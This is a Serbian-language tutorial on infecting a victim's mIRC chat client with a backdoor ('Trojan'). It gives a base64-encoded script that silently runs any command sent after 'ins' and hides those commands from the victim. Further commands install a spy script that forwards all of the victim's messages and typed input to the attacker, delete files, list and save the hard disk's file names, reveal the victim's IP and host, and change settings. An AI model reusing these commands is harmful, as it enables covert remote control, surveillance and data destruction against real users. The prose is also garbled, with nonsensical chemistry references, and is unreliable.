MORAM VAM NAGLASITI DA
"virus nije stetan,
koliko je zloba komande za pretraživanje"
1)Inficirati Zrtvu
Taj virus moze biti stavljen
u rad ili funkciju zrtve u vremenu
simbolike hemijskih elementa helijuma
koji je upisan za komandu :
//write
czm.mrc
$decode
(b24gXio6dGV4dDppbnMqOj86
eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==
,zatim znak za molekularnu tezinu |
.opterecenje zaustavljanja citaca czm. mrc |
msg LUXILIUS is online
LUXILIUS = luxilius. Ta žrtva ce medjutim uzvratiti poruku online 'I is
prikazacu vam simbol hemijskog elementa helijuma
zabavom pisanja u toj komandi. Možete editovati simbol ili ukloniti
' | Luxilius is online ' deo simbola.
Sledecu komandu cu izvrsiti: new. mrc file czm zatim prebacujem
u (encode komandi) ^*:text.ins*:? :{. $+ $2- | haltdef }
The haltdef ce blokirati vasu poruku kod zrtve i nece moci da vam
uzvrati 'ins' zatim ce se zrtva upitati ko je poslao ovu komandu?ko
kontrolise mIRC?
Primer :
/msg zrtvin 'ins' msg #channel hi
Ovo ce pustiti zrtvi #channel 'hi' poruku,
ali zrtva je nece videti ,dok ce ostali kanali moci da vide
znaci tvoju poruku zrtva nece videti u simbolu
' ins msg #channel hi' jer ce biti blokirana od strane
' haltdef ' savrseno el,da?
Kad zavrsite komandu zrtvi ce Trojan biti aktiviran.
Mozete kreirati i Spy funkciju ukoliko odradite greb prelaz
u komandi nekog najposecenijeg kanala kroz
aktivaciju,obavestenje o dostavi,poslatih poruka u zavrnoj
komandi:
2) Spy the victim:
/msg victim ins write -c myscript.mrc
/msg victim ins unload -rs myscript.mrc
/msg victim insert write -c myscript.mrc on
*:CONNECT: { .msg LUXILIUS is online }
/msg victim ins write myscript.mrc on *:TEXT:*:*:
{ .msg LUXILIUS
$timestamp<-<$+$iif($chan,# $+:,$+ )$+$nick $+>$1-}
/msg victim ins write myscript.mrc on *:INPUT:*:
{ .msg LUXILIUS $timestamp -> $iif($left($1,1)!= /,<$+$me$+
>,[COMMAND]) $1-}
/msg victim ins load -rs myscript.mrc
Savrseno uradjen posao,pustiti Spy funkciju i ujedno
je mozete kontrolisati funkcijom (stop) koju ces upisati
sledecim simbolom :
/msg victim ins unload -rs myscript.mrc
Note:victim = ce ucitati komandu zrtve koja je vec primila
Trojan
3) korak zrtvinog remote fajla (.mrc)
Mozete vrsiti deinstalaciju funkcijom:
/msg victim insert write -c TVOJSCRIPTNICK.mrc on
1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
Primer :
/msg victim insert write -c LUXILIUS.mrc on
1:TEXT:*!opme*:#CHANNEL:/mode #channel+o$nick
/msg victim ins .load –rs LUXILIUSt.mrc
4) Trojan komande
BRISANJE FAJLA :
/msg victim ins remove C:\Textfile.txt
UBACIVANJE VASEG SAJTA ILI BLOGA
U NJEGOVU HOMEPAGE OPCIJU:
/msg victim ins url
www.site.comBAN USER:
/msg victim ins ban #channel user
PREGLED ZRTVINOG HARD DISKa:
/msg victim ins write MAB1 alias MAB1
{ .echo $findfile(C:\,porn.*,0,msg user $1-) }
/msg victim ins .load -rs MAB1
/msg victim ins MAB1
SKENIRANJE ZRTVINOG HARD DISKa KOJI CETE
U SAVE OPCIJU MORATI TOKOM KOPIRANJA
upisati u formatu .txt:
//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)
UKOLIKO ZRTVA IMA DOBAR SECURITY RAZLOG
UPISITE SLEDECE:
/msg victim write
MyNewScript.mrc
$decode
(b24gXio6dGV4dDppbnMqOj8
6eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) |
.load -rs MyNewScript.mrc
PRONADJI ZRTVIN IP AKO JE NALEPIO MASKU:
/msg victim ins //msg YOURNICK $ip
PRONADJI ZRTVIN HOST AKO JE NALEPIO MASKU:
/msg victim ins //msg YOURNICK $host
PROMENITE ZRTVIN ALTERNATIVNI NICK:
/msg victim ins anick <nickname>
PROMENITE ZRTVIN BACKGROUND PICTURE:
/msg victim ins background
[-aemsgdluhcfnrtpx] [window] [filename]
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture
PROMENITE ZRTVI FONT I FONT SIZE:
/msg victim ins font -asgbd <fontsize> <fontname>
UPISITE NOVI DIREKTORIJUM
U ZRTVIN HARD DISK:
/msg victim ins mkdir <dirname>